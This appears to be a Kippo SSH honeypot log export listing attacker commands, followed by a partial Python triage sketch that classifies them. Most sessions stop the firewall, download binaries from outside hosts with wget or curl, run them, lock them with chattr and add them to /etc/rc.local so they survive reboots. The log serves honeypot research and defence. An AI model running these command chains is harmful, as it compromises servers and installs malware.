208,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:16",\N,1,"cd .."
209,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:17",\N,1,"ls"
210,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:20",\N,1,"cat /etc/passwd"
211,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:21",\N,1,"ls"
212,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:27",\N,1,"exit"
213,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:29",\N,1,"exit"
214,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:31",\N,0,"quit"
215,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:10",\N,1,"wget www.google.com"
216,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:13",\N,0,"quit"
217,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:15",\N,1,"exit"
218,"2fba19506e9e11e4b3d002b6d5d64ab8","2014-11-17 21:10:47",\N,1,"ls"
219,"2fba19506e9e11e4b3d002b6d5d64ab8","2014-11-17 21:10:52",\N,1,"cat /etc/passwd"
220,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:27",\N,1,"ls"
221,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:29",\N,1,"exit"
222,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:31",\N,0,"quit"
223,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:33",\N,1,"exit"
224,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:41",\N,1,"exit"
225,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:26",\N,0,"service iptables stop"
226,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:30",\N,1,"wget http://111.73.45.158:881/a54321"
227,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:34",\N,1,"chmod 0777 a54321"
228,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:38",\N,0,"./a54321 &"
229,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:42",\N,1,"chattr +i a54321"
230,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:46",\N,1,"wget http://111.73.45.158:881/b54321"
231,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:50",\N,1,"chmod 0777 b54321"
232,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:54",\N,0,"./b54321 &"
233,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:58",\N,1,"chattr +i b54321"
234,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:02",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
235,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:06",\N,1,"echo \"./a54321&\">>/etc/rc.local"
236,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:10",\N,1,"echo \"./b54321&\">>/etc/rc.local"
237,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:14",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
238,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:18",\N,1,"whoami"
239,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:47",\N,0,"service iptables stop"
240,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:51",\N,1,"wget http://111.73.45.158:881/a54321"
241,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:55",\N,1,"chmod 0777 a54321"
242,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:59",\N,0,"./a54321 &"
243,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:03",\N,1,"chattr +i a54321"
244,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:07",\N,1,"wget http://111.73.45.158:881/b54321"
245,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:11",\N,1,"chmod 0777 b54321"
246,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:15",\N,0,"./b54321 &"
247,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:19",\N,1,"chattr +i b54321"
248,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:23",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
249,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:27",\N,1,"echo \"./a54321&\">>/etc/rc.local"
250,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:31",\N,1,"echo \"./b54321&\">>/etc/rc.local"
251,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:35",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
252,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:39",\N,1,"whoami"
253,"f5727b5c746511e4b3d002b6d5d64ab8","2014-11-25 05:43:35",\N,1,"ps -ef"
254,"f5727b5c746511e4b3d002b6d5d64ab8","2014-11-25 05:43:39",\N,1,"pwd"
255,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:35",\N,1,"ls"
256,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:37",\N,1,"pwd"
257,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:38",\N,1,"ifconfig"
258,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:50",\N,1,"wget http://222.186.31.11:1/lan2.6"
259,"337bfaf47c6811e4b3d002b6d5d64ab8","2014-12-05 10:19:40",\N,1,"uname -a"
260,"1a59dfa87ce711e4b3d002b6d5d64ab8","2014-12-06 01:28:12",\N,1,"uname -a"
261,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:27",\N,0,"/etc/init.d/iptables stop"
262,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:31",\N,0,"service iptables stop"
263,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:35",\N,0,"SuSEfirewall2 stop"
264,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:39",\N,0,"reSuSEfirewall2 stop"
265,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:43",\N,1,"wget http://115.239.224.241:11111/slan"
266,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:47",\N,1,"chmod 0777 slan"
267,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:51",\N,0,"./slan &"
268,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:55",\N,1,"chattr +i slan"
269,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:59",\N,1,"wget http://115.239.224.241:11111/ulan"
270,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:03",\N,1,"chmod 0777 ulan"
271,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:07",\N,0,"./ulan &"
272,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:11",\N,1,"chattr +i ulan"
273,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:15",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
274,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:19",\N,1,"echo \"./slan&\">>/etc/rc.local"
275,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:23",\N,1,"echo \"./ulan&\">>/etc/rc.local"
276,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:27",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
277,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:31",\N,1,"whoami"
278,"f3a68c26859711e4b3d002b6d5d64ab8","2014-12-17 02:54:18",\N,1,"w"
279,"f3a68c26859711e4b3d002b6d5d64ab8","2014-12-17 02:54:21",\N,1,"ps -ef"
280,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:23:49",\N,1,"ls"
281,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:23:52",\N,1,"pwd"
282,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:23:58",\N,1,"cd /"
283,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:24:03",\N,1,"ls"
284,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:24:05",\N,1,"exit"
285,"440926508a0311e4af3102b6d5d64ab8","2014-12-22 17:52:51",\N,0,"test"
286,"440926508a0311e4af3102b6d5d64ab8","2014-12-22 17:52:53",\N,0,"something"
287,"440926508a0311e4af3102b6d5d64ab8","2014-12-22 17:52:54",\N,1,"exit"
288,"3652f0508ab611e4af3102b6d5d64ab8","2014-12-23 15:13:29",\N,1,"uname -a"
289,"3652f0508ab611e4af3102b6d5d64ab8","2014-12-23 15:13:43",\N,1,"wget http://121.40.19.239:52365/DDosClient"
290,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:17:50",\N,0,"service iptables stop"
291,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:17:54",\N,1,"wget http://115.239.248.208:5252/Gates"
292,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:17:58",\N,1,"chmod 0777 Gates"
293,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:02",\N,0,"./Gates &"
294,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:06",\N,1,"chattr +i Gates"
295,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
296,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:14",\N,1,"echo \"./Gates&\">>/etc/rc.local"
297,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:18",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
298,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:22",\N,1,"whoami"
299,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:10",\N,0,"service iptables stop"
300,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:14",\N,1,"wget http://115.239.248.208:5252/Gates2.4"
301,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:18",\N,1,"chmod 0777 Gates2.4"
302,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:22",\N,0,"./Gates2.4 &"
303,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:26",\N,1,"chattr +i Gates2.4"
304,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:30",\N,1,"wget http://115.239.248.208:5252/GatesFreeBsd"
305,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:34",\N,1,"chmod 0777 GatesFreeBsd"
306,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:38",\N,0,"./GatesFreeBsd &"
307,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:42",\N,1,"chattr +i GatesFreeBsd"
308,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:46",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
309,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:50",\N,1,"echo \"./Gates2.4&\">>/etc/rc.local"
310,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:54",\N,1,"echo \"./GatesFreeBsd&\">>/etc/rc.local"
311,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
312,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:41:02",\N,1,"whoami"
313,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:47",\N,1,"ls"
314,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:50",\N,1,"cd /"
315,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:50",\N,1,"ls"
316,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:57",\N,1,"cat /etc/passwd"
317,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:02:01",\N,1,"exit"
318,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:02:04",\N,0,"testing"
319,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:02:06",\N,0,"testing"
320,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:16:17",\N,0,"ip"
321,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:16:21",\N,1,"ifconfig"
322,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:16:34",\N,1,"wget h5tt"
323,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:17:03",\N,1,"wget http://216.99.157.168:8080/meng"
324,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:17:19",\N,1,"wget http://216.99.157.168:8080/meng"
325,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:17:38",\N,1,"wget http://216.99.157.168:8080/jin1"
326,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:18:38",\N,1,"wget http://216.99.157.168:8080/xixi"
327,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:19:05",\N,1,"ps -ef | grep libvirtdsdd"
328,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:19:35",\N,0,"ethtool eth0"
329,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:19:43",\N,1,"ps -aux"
330,"42c7255eab8611e4af3102b6d5d64ab8","2015-02-03 09:23:27",\N,1,"wget http://216.99.157.168:8080/meng"
331,"1e6f1ff8aba511e4af3102b6d5d64ab8","2015-02-03 13:04:09",\N,1,"uptime"
332,"1e6f1ff8aba511e4af3102b6d5d64ab8","2015-02-03 13:04:19",\N,1,"ifconfig"
333,"96d8e21ead0111e4af3102b6d5d64ab8","2015-02-05 06:38:29",\N,1,"wget http://121.41.88.50:88/AliApp"
334,"96d8e21ead0111e4af3102b6d5d64ab8","2015-02-05 06:38:33",\N,1,"chmod 777 AliApp"
335,"96d8e21ead0111e4af3102b6d5d64ab8","2015-02-05 06:38:37",\N,0,"./AliApp"
336,"30862ab2b93611e4af3102b6d5d64ab8","2015-02-20 19:25:22",\N,1,"w"
337,"6442e138b93611e4af3102b6d5d64ab8","2015-02-20 19:26:46",\N,1,"w"
338,"e0477ef6b98611e4af3102b6d5d64ab8","2015-02-21 05:02:59",\N,1,"cd /tmp"
339,"e0477ef6b98611e4af3102b6d5d64ab8","2015-02-21 05:03:08",\N,1,"wget http://183.136.213.96:8090/10091"
340,"9c3b27c2bcc311e4af3102b6d5d64ab8","2015-02-25 07:55:12",\N,1,"uname -a"
341,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:27",\N,1,"rm *"
342,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:31",\N,0,"curl -o /tmp/gnkk-d http://222.186.52.53:3377/gnkk-d"
343,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:35",\N,1,"wget -c http://hackerxxy.3322.org:3377/gnkk-d"
344,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:39",\N,1,"chmod 777 /tmp/./gnkk-d"
345,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:43",\N,1,"chmod 777 /tmp/gnkk-d"
346,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:47",\N,0,"/tmp/./gnkk-d"
347,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:51",\N,0,"/tmp/gnkk-d"
348,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:55",\N,1,"cd /tmp"
349,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:59",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
350,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:03",\N,1,"echo \"./gnkk-d&\">>/etc/rc.local"
351,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:07",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
352,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:11",\N,1,"rm /tmp/*"
353,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:15",\N,1,"wget http://hackerxxy.3322.org:3377/xy-32"
354,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:19",\N,1,"chmod 777 xy-32"
355,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:23",\N,1,"chmod u+x xy-32"
356,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:27",\N,0,"./xy-32&"
357,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:31",\N,1,"nohup /root/xy-32& > /dev/null 2>&1 &"
358,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:35",\N,1,"cd /tmp"
359,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:39",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
360,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:43",\N,1,"echo \"./xy-32&\">>/etc/rc.local"
361,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:47",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
362,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:52:50",\N,0,"service iptables stop"
363,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:52:54",\N,1,"wget wget http://222.186.31.73:8080/Manager"
364,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:52:58",\N,1,"chmod 0777 Manager"
365,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:02",\N,0,"./Manager &"
366,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:06",\N,1,"chattr +i Manager"
367,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
368,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:14",\N,1,"echo \"./Manager&\">>/etc/rc.local"
369,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:18",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
370,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:22",\N,1,"whoami"
371,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:13:47",\N,1,"wget http://218.244.148.238:8080/bin.sh"
372,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:00",\N,1,"chmod 0755 ./bin.sh"
373,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:11",\N,1,"nohup ./bin.sh> /dev/null 2>&1 &"
374,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:23",\N,0,"curl http://218.244.148.238:8080/npc -o /tmp/npc"
375,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:35",\N,1,"chmod 0755 /tmp/./npc"
376,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:47",\N,0,"/tmp/./npc"
377,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:59",\N,1,"wget http://218.244.148.238:8080/npc"
378,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:11",\N,1,"chmod 0755 ./npc"
379,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:23",\N,0,"./npc"
380,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:35",\N,0,"curl http://218.244.148.238:8080/npc1 -o /tmp/npc1"
381,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:47",\N,1,"chmod 0755 /tmp/./npc1"
382,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:59",\N,0,"/tmp/./npc1"
383,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:16:11",\N,1,"wget http://218.244.148.238:8080/npc1"
384,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:16:23",\N,1,"chmod 0755 ./npc1"
385,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:16:35",\N,0,"./npc1"
386,"495dc05acd8a11e4af3102b6d5d64ab8","2015-03-18 16:17:38",\N,1,"wget -O /tmp/Gatesz http://61.147.121.113:3221/Gatesz"
387,"bb9120bad17a11e4af3102b6d5d64ab8","2015-03-23 16:36:40",\N,1,"echo \"WinSCP: this is end-of-file:0\""
388,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:44",\N,0,"service iptables stop"
389,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:48",\N,1,"wget http://117.21.176.54:9191/choushabi"
390,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:52",\N,1,"chmod 0755 /root/choushabi"
391,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:56",\N,1,"nohup /root/choushabi > /dev/null 2>&1 &"
392,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:00",\N,1,"chmod 777 choushabi"
393,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:04",\N,0,"./choushabi"
394,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:08",\N,1,"chmod 0755 /root/choushabi"
395,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,1,"nohup /root/choushabi &gt"
396,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,0,"/dev/null 2&gt"
397,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,0,"&amp"
398,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,0,"1 &amp"
399,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:16",\N,1,"chmod 0777 choushabi"
400,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:08",\N,0,"service iptables stop"
401,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:12",\N,1,"wget http://117.21.176.54:9191/choushabi"
402,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:16",\N,1,"chmod 0755 /root/choushabi"
403,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:20",\N,1,"nohup /root/choushabi > /dev/null 2>&1 &"
404,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:24",\N,1,"chmod 777 choushabi"
405,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:28",\N,0,"./choushabi"
406,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:32",\N,1,"chmod 0755 /root/choushabi"
407,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,1,"nohup /root/choushabi &gt"
408,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,0,"/dev/null 2&gt"
409,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,0,"&amp"
410,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,0,"1 &amp"
411,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:40",\N,1,"chmod 0777 choushabi"
412,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:44",\N,1,"chmod u+x choushabi"
413,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:48",\N,0,"./choushabi &"
414,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:52",\N,1,"chmod u+x choushabi"
415,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:56",\N,0,"./choushabi &"
416,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:00",\N,1,"cd /tmp"
417,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:04",\N,0,"service iptables stop"
418,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:08",\N,1,"wget http://117.21.176.54:9191/choushabi"
419,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:12",\N,1,"chmod 0755 /root/choushabi"
420,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:16",\N,1,"nohup /root/choushabi > /dev/null 2>&1 &"
421,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:20",\N,1,"chmod 777 choushabi"
422,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:24",\N,0,"./choushabi"
423,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:28",\N,1,"chmod 0755 /root/choushabi"
424,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,1,"nohup /root/choushabi &gt"
425,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,0,"/dev/null 2&gt"
426,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,0,"&amp"
427,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,0,"1 &amp"
428,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:36",\N,1,"chmod 0777 choushabi"
429,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:40",\N,1,"chmod u+x choushabi"
430,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:44",\N,0,"./choushabi &"
431,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:48",\N,1,"chmod u+x choushabi"
432,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:52",\N,0,"./choushabi &"
433,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:56",\N,1,"cd /tmp"
434,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:00",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
435,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:04",\N,1,"echo \"./choushabi&\">>/etc/rc.local"
436,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:08",\N,1,"echo \"./choushabi&\">>/etc/rc.local"
437,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:12",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
438,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:55:46",\N,0,"/etc/init.d/iptables stopservice iptables stop"
439,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:55:52",\N,0,"SuSEfirewall2 stopreSuSEfirewall2 stop"
440,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:55:58",\N,1,"cd /tmp"
441,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:56:04",\N,1,"wget -c http://117.21.176.79:333/l3600"
442,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:56:10",\N,1,"chmod 777 l3600"
443,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:56:16",\N,0,"./l3600"
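
An added example, not part of the original post or of Kippo: a triage sketch that groups rows like the ones above by session and labels the stages that keep repeating in the dump (firewall stop, download, chmod, execute, `chattr +i`, append to `/etc/rc.local`). It assumes the dump is a CSV export of the honeypot's input table; the sample rows, session ids, file names and stage names are constructed for illustration.

```python
import csv
import io
import re
from collections import defaultdict

# Constructed rows in the dump's layout: id, session, timestamp, realm (\N = NULL),
# success flag, input. Session ids and the "dropper"/"sample" names are made up;
# addresses come from the 192.0.2.0/24 documentation range.
SAMPLE = r'''1,"aaaa0001","2015-01-04 19:17:50",\N,0,"service iptables stop"
2,"aaaa0001","2015-01-04 19:17:54",\N,1,"wget http://192.0.2.10:5252/dropper"
3,"aaaa0001","2015-01-04 19:17:58",\N,1,"chmod 0777 dropper"
4,"aaaa0001","2015-01-04 19:18:02",\N,0,"./dropper &"
5,"aaaa0001","2015-01-04 19:18:06",\N,1,"chattr +i dropper"
6,"aaaa0001","2015-01-04 19:18:14",\N,1,"echo \"./dropper&\">>/etc/rc.local"
7,"aaaa0001","2015-01-04 19:18:22",\N,1,"whoami"
8,"bbbb0002","2014-12-22 17:23:49",\N,1,"ls"
9,"bbbb0002","2014-12-22 17:23:52",\N,1,"pwd"
10,"bbbb0002","2014-12-22 17:24:05",\N,1,"exit"
11,"cccc0003","2015-02-03 09:16:21",\N,1,"ifconfig"
12,"cccc0003","2015-02-03 09:17:03",\N,1,"wget http://192.0.2.77:8080/sample"
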